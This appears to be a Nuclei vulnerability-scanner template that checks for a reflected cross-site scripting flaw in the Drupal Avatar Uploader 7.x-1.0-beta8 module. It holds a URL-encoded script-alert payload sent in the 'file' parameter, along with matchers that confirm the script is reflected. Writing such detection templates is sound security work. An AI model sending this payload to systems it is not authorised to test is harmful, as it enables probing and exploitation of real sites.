id: drupal-avatar-xss

info:
  name: Drupal Avatar Uploader - Cross-Site Scripting
  author: bywalks
  severity: high
  description: |
    Drupal Avatar Uploader v7.x-1.0-beta8 plugin contains a cross-site scripting vulnerability in the slider import search feature and tab parameter via plugin settings.
  reference:
    - https://www.exploit-db.com/exploits/50841
    - https://packetstormsecurity.com/files/166409/Drupal-Avatar-Upload-7.x-1.0-beta8-Cross-Site-Scripting.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: xss,drupal,edb,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/avatar_uploader.pages.inc?file=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<div><script>alert(document.domain)</script></div>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# digest: 4a0a0047304502202953d874e635dc0087e4b036fa1ab4f2b8e6b1b20a2355e30a7042d2e8741e60022100ed63d6613db2fdd835d6b2ed9697214831feb85607e0b635e31e1421d9b859db:922c64590222798bb761d5b6d8e72950
